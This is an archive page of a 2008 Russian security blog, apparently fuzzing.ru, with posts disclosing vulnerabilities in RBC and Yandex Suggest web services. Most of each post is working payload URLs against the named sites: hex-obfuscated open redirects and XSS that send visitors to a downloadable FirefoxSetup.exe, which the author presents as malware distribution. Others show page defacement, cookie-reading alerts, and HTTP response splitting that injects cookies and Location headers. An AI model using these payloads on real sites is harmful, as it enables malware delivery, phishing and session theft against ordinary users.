Архив раздела Октябрь, 2008

Вновь об уязвимостях проектов РосБизнесКонсалтинга

Опубликовано admin on Октябрь 29th, 2008 filed in Уязвимости

Обновление: новые примеры, предыдущие исправлены.
Берем первый попав?ийся мне вариант, где файл отдает некий скрипт (прямой редирект на файл вроде исправили).
http://www.rbc.ru/bredir/?code=!%66%72%61%74%72%69%61%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%41%75%64%69%6F%2F%69%6E%64%65%78%2E%63%67%69%3F%73%6F%6E%67%3D%33%34%32%32%34%26%77%61%76%3D%31
http://banner.rbc.ru/banredir.cgi?code=!%66%72%61%74%72%69%61%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%41%75%64%69%6F%2F%69%6E%64%65%78%2E%63%67%69%3F%73%6F%6E%67%3D%33%34%32%32%34%26%77%61%76%3D%31
Встретить в сети нормально организованный скриптовый редирект очень непросто, подавляющее боль?инство представляют из себя серьезную уязвимость.

Тип уязвимости: Переадресация URL.
Приложение: http://www.rbc.ru/bredir/, http://banner.rbc.ru/banredir.cgi, http://www.rbc.ru/3e/9jjjgygaf/click
GET-переменные: code

Примеры:
http://www.rbc.ru/bredir/?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65
http://banner.rbc.ru/banredir.cgi?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65
http://www.rbc.ru/3e/9jjjgygaf/click?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65

Тип уязвимости: ?ндексирование директорий (Directory Indexing), как следствие -> Раскрытие исходного кода (Source code […]

Читать полностью..>>

Множественные уязвимости проектов РосБизнесКонсалтинга

Опубликовано admin on Октябрь 22nd, 2008 filed in Уязвимости

Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /
GET-переменные: нет

Примечание: Уязвимость вызвана отсутствием фильтрации (или кодирования) исходного URL. Работает только во всех версиях Internet Explorer.
Возможные области применения (приведены простые примеры):

Распространение вредоносного ПО - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.location.replace(’http://fuzzing.ru/%62%6C%6F%67/%66%69%6C%65%73/FirefoxSetup.exe’);</script>
Подмена содержимого страницы - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.body.innerHTML=’<h1>Fuzzing.ru’</script>

 Приведенные примеры очень грубые. Без сомнений можно полагать, что качественная эксплуатация данных уязвимостей является […]

Читать полностью..>>

Обновление :: Исправление уязвимостей suggest.yandex.ru

Опубликовано admin on Октябрь 20th, 2008 filed in Уязвимости

По факту исправлений понятно, что исправлено лишь расщепление HTTP-запроса. Все остальное работает несколько в другом виде.

http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3E%3C%2F%62%6F%64%79%3E
http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%62%6F%64%79%3E
http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%27%72%65%66%72%65%73%68%27%20%63%6F%6E%74%65%6E%74%3D%27%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%6D%65%74%61%3E

По другим примерам аналог находится чуть более сложно.

Читать полностью..>>

Множественные уязвимости в сервисе поисковых подсказок Яндекса (suggest.yandex.ru)

Опубликовано admin on Октябрь 16th, 2008 filed in Уязвимости

Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /suggest-ya.cgi
GET-переменные: part

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=<script>alert(document.cookie)</script>

Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)
Приложение: /suggest-ya.cgi
GET-переменные: ct

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (устанавливает cookie от имени сервера)
Простые примеры применения, не говоря уже о сложных вариантах.

Универсальный редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru

?спользование уязвимостей других приложений или распостранение вирусов (подмена content-type)

Можно предложить, к примеру, скачать с Яндекса великолепную […]

Читать полностью..>>